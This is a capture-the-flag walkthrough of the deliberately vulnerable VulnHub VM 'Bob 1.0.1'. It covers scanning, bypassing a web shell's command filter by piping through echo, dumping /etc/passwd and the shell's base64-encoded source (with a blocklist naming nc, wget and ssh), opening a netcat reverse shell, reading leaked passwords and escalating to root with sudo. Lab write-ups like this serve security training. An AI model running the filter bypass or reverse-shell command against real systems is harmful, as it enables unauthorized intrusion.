BOB 1.0.1
URL: https://www.vulnhub.com/entry/bob-101,226/
This VM is not a difficult one , rather it is a really easy one to crack. The key for pwning it is not to get frustrated at th begining.
1.I loaded the VM on my VirtualBox.
2. The machine got the IP : 192.168.56.101
3. NMAP shows only port 80 is open
root@mrrobot:~# nmap -sS -sV 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-15 23:50 MST
Nmap scan report for 192.168.56.101
Host is up (0.00030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.17 seconds
root@mrrobot:~#
4. I accessed http://192.168.56.101 in browser, a web homepage came up telling Website Under Construction
5. Looked at the source code with curl, nothing juicy there
6. There are 4 hyperlinks on this page,
News
About Us
Contact Us
Login
7. Looked at each of thm and view sourced each of them, nothing helpful
8. Ran dirb now dirb http://192.168.56.101 below 3 came up
—- Scanning URL: http://192.168.56.101/ —-
+ http://192.168.56.101/index.html (CODE:200|SIZE:1425)
+ http://192.168.56.101/robots.txt (CODE:200|SIZE:111)
+ http://192.168.56.101/server-status (CODE:403|SIZE:302)
9. Looked at robots.txt
root@mrrobot:~# curl http://192.168.56.101/robots.txt
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html
10. Though said disallow, wanted to try each of them once
login.php did not allow
11. Got response HTML for curl http://192.168.56.101/dev_shell.php
12. Opened it in browser, with name it looks like its a web shell.
13.Tried ls, it is not allowing.. got a response “Get out skid lol”
14. Tried cat index.html, got same output
15. So it is blocking commands,is it realy a shell? Lets try echo
echo “hello world”
16. Voila, got output as hello world. So echo is alowed. Now let me try other commands and pipe to echo
17. I tried echo |cat /etc/passwd and it gave me below output
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:x:104:65534::/nonexistent:/bin/false Debian-exim:x:105:109::/var/spool/exim4:/bin/false rtkit:x:106:110:RealtimeKit,,,:/proc:/bin/false dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false avahi-autoipd:x:108:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false messagebus:x:109:112::/var/run/dbus:/bin/false usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false lightdm:x:112:116:Light Display Manager:/var/lib/lightdm:/bin/false pulse:x:113:117:PulseAudio daemon,,,:/var/run/pulse:/bin/false avahi:x:114:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false saned:x:115:121::/var/lib/saned:/bin/false c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash jc:x:1002:1002:James C,,,:/home/jc:/bin/bash seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash sshd:x:116:65534::/run/sshd:/usr/sbin/nologin proftpd:x:117:65534::/run/proftpd:/bin/false ftp:x:118:65534::/srv/ftp:/bin/false
18. This is good. Let me try to see if I can look at the source code of the shell file
19. First lets see if I can see all files under web directory
echo |ls -ltr /var/www/html
20. total 1560 -rw-r–r– 1 root root 26357 Mar 4 2018 school_badge.png -rw-r–r– 1 root root 111 Mar 4 2018 robots.txt -rw-r–r– 1 root root 4086 Mar 4 2018 news.html -rw-r–r– 1 root root 1560 Mar 4 2018 login.html -rw-r–r– 1 root root 1925 Mar 4 2018 lat_memo.html -rw-r–r– 1 root root 1425 Mar 4 2018 index.html.bak -rw-r–r– 1 root root 1425 Mar 4 2018 index.html -rw-r–r– 1 root root 1177950 Mar 4 2018 dev_shell_back.png -rw-r–r– 1 root root 1361 Mar 4 2018 dev_shell.php.bak -rw-r–r– 1 root root 1396 Mar 4 2018 dev_shell.php -rw-r–r– 1 root root 3145 Mar 4 2018 contact.html -rw-r–r– 1 root root 340400 Mar 4 2018 WIP.jpg -rw-r–r– 1 root root 673 Mar 8 2018 passwords.html -rw-r–r– 1 root root 2579 Mar 8 2018 about.html
21.I tried echo |cat /var/www/html/dev_shell.php to look into the code of this shell, but ohh its the PHP and the output sectio is just rendering PHP
So as an output I am getting the same page content of the page. i need the sourcecode of the PHP in text and not rendered.
22. I can do so by encoding the output of previous command in base64 and print that on page, so I tried
echo |cat /var/www/html/dev_shell.php| base64
Below is the output, which is basically the PHP source code of the page in base64 encoded
Output:
PGh0bWw+Cjxib2R5PgogIDw/cGhwCiAgICAvL2luaXQKICAgICRpbnZhbGlkID0gMDsKICAgICRj b21tYW5kID0gKCRfUE9TVFsnaW5fY29tbWFuZCddKTsKICAgICRiYWRfd29yZHMgPSBhcnJheSgi cHdkIiwgImxzIiwgIm5ldGNhdCIsICJzc2giLCAid2dldCIsICJwaW5nIiwgInRyYWNlcm91dGUi LCAiY2F0IiwgIm5jIik7CiAgPz4KICA8c3R5bGU+CiAgICAjYmFja3sKICAgICAgcG9zaXRpb246 IGZpeGVkOwogICAgICB0b3A6IDA7CiAgICAgIGxlZnQ6IDA7CiAgICAgIG1pbi13aWR0aDogMTAw JTsKICAgICAgbWluLWhlaWdodDogMTAwJTsKICAgICAgei1pbmRleDotMTAKICAgIH0KICAgICAg I3NoZWxsewogICAgICAgIGNvbG9yOiB3aGl0ZTsKICAgICAgICB0ZXh0LWFsaWduOiBjZW50ZXI7 CiAgICB9CiAgPC9zdHlsZT4KICA8IS0tIFdJUCwgZG9uJ3QgZm9yZ2V0IHRvIHJlcG9ydCBhbnkg YnVncyB3ZSBkb24ndCB3YW50IGFub3RoZXIgYnJlYWNoIGd1eXMKICAtQm9iIC0tPgogIDxkaXYg aWQ9InNoZWxsIj4KICAgIDxoMj4KICAgICAgZGV2X3NoZWxsCiAgICA8L2gyPgogICAgPGZvcm0g YWN0aW9uPSJkZXZfc2hlbGwucGhwIiBtZXRob2Q9InBvc3QiPgogICAgICBDb21tYW5kOiA8aW5w dXQgdHlwZT0idGV4dCIgbmFtZT0iaW5fY29tbWFuZCIgLz4gPGJyPgogICAgICA8aW5wdXQgdHlw ZT0ic3VibWl0IiB2YWx1ZT0ic3VibWl0Ij4KICAgIDwvZm9ybT4KICAgIDxicj4KICAgIDxoNT5P dXRwdXQ6PC9oNT4KICAgIDw/cGhwCiAgICBzeXN0ZW0oInJ1bm5pbmcgY29tbWFuZC4uLiIpOwog ICAgICAvL2V4ZWN1dGVzIHN5c3RlbSBDb21tYW5kCiAgICAgIC8vY2hlY2tzIGZvciBzbmVha3kg OwogICAgICBpZiAoc3RycG9zKCRjb21tYW5kLCAnOycpICE9PWZhbHNlKXsKICAgICAgICBzeXN0 ZW0oImVjaG8gTmljZSB0cnkgc2tpZCwgYnV0IHlvdSB3aWxsIG5ldmVyIGdldCB0aHJvdWdoIHRo aXMgYnVsbGV0cHJvb2YgcGhwIGNvZGUiKTsgLy9kb2Vzbid0IHdvcmsgOlAKICAgICAgfQogICAg ICBlbHNlewogICAgICAgICRpc19oZV9hX2JhZF9tYW4gPSBleHBsb2RlKCcgJywgdHJpbSgkY29t bWFuZCkpOwogICAgICAgIC8vY2hlY2tzIGZvciBkYW5nZXJvdXMgY29tbWFuZHMKICAgICAgICBp ZiAoaW5fYXJyYXkoJGlzX2hlX2FfYmFkX21hblswXSwgJGJhZF93b3JkcykpewogICAgICAgICAg c3lzdGVtKCJlY2hvIEdldCBvdXQgc2tpZCBsb2wiKTsKICAgICAgICB9CiAgICAgICAgZWxzZXsK ICAgICAgICAgIHN5c3RlbSgkX1BPU1RbJ2luX2NvbW1hbmQnXSk7CiAgICAgICAgfQogICAgICB9 CiAgICA/PgogIDwvZGl2PgogICAgPGltZyBzcmM9ImRldl9zaGVsbF9iYWNrLnBuZyIgaWQ9ImJh Y2siIGFsdD0iIj4KPC9ib2R5Pgo8L2h0bWw+Cg==
23.I copied that and decoded it online
24. looking at the source code I came to know the shell executes every command we pass along. But if command is starting with any of the following
“pwd”, “ls”, “netcat”, “ssh”, “wget”, “ping”, “traceroute”, “cat”, “nc”); then it won’t allow.
25.So I can make sure my command doesn’t have these words at beginging.
26. Time for real shell, lets see if they have nc installed.
27. i executed echo | man nc and got nc man page. Thats it then. it has nc installed
28. On my host I started to listen on port 9050 by the below command
root@mrrobot:~# nc -vlp 9050
listening on [any] 9050 …
29. On page I give the below input and click on submit
echo |nc -e /bin/sh 192.168.56.1 9050
The page looks like loading
30. On my host where I was listening on 9050 I do see a connection made and I am into shell
root@mrrobot:~# nc -vlp 9050
listening on [any] 9050 …
192.168.56.101: inverse host lookup failed: Unknown host
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.101] 45128
31. whoami tells I am www-data so definitely very limited access
32. I wa exploring the system, I could go to /home/ and saw there are 4 users home folders
s -al
total 24
drwxr-xr-x 6 root root 4096 Mar 4 2018 .
drwxr-xr-x 22 root root 4096 Mar 5 2018 ..
drwxr-xr-x 18 bob bob 4096 Jan 16 01:34 bob
drwxr-xr-x 15 elliot elliot 4096 Feb 27 2018 elliot
drwxr-xr-x 15 jc jc 4096 Jan 16 01:30 jc
drwxr-xr-x 15 seb seb 4096 Mar 5 2018 seb
33. Bob being very important name for this VM, I went inside bob and when I did ls -al I saw a hidden file
.old_passwordfile.html
34.I opened it and contents are interesting, looks like there are passwords for 2 users
cat .old_passwordfile.html
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
35. On the VM where the login prompt is there, I immediately tried these 2
I was able to login to that Ubuntu system with user jc, but not as seb.
36. I logged into that Ubuntu system as jc
37. But I canot sudo su to root, jc doesn’t have much priviledges.
38. I still resumed looking for other files
39. Under bob’s home in documents I saw some more files
ls -al
total 20
drwxr-xr-x 3 bob bob 4096 Mar 5 2018 .
drwxr-xr-x 18 bob bob 4096 Jan 16 01:34 ..
drwxr-xr-x 3 bob bob 4096 Mar 5 2018 Secret
-rw-r–r– 1 bob bob 91 Mar 5 2018 login.txt.gpg
-rw-r–r– 1 bob bob 300 Mar 4 2018 staff.txt
40. That staff.txt doesn’t have anything
41.login.txt.gpg is an encrypted file, and we must hav key. i even could not find any clue fom staff.txt
42. looked further inside Secret folder and found a script notes.sh in the following location
/home/bob/Documents/Secret/Keep_Out/Not_p*rn/No_Lookie_In_Here
43. And the notes.sh is just echoing some lines on screen. So I executed the script and got below output
./notes.sh
-= Notes =-
Harry Potter is my faviorite
Are you the real me?
Right, I’m ordering pizza this is going nowhere
People just don’t get me
Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
Cucumber
Rest now your eyes are sleepy
Are you gonna stop reading this yet?
Time to fix the server
Everyone is annoying
Sticky notes gotta buy em
44. The word Cucumber is standing out
45. Tried gpg -d login.txt.gpg , when prompted for passphrase I tried Cucumber but it didn’t work
46.Looked futher and realized the 1st letters of each of the line in notes.sh is making
HARPOCRATES
47. Googled it and found it is God for silence,secret and confidentiality
48. tried this this time in gpg and it got decrypted the ut put I got
bob:b0bcat_
49. Now logged off from jc and tried to login with bob and password b0bcat_ I am able to
50. Now tried to do sudo su, and I am able to sudo to root. So I am root
51. went to /
52. cat flag.txt
53. Done
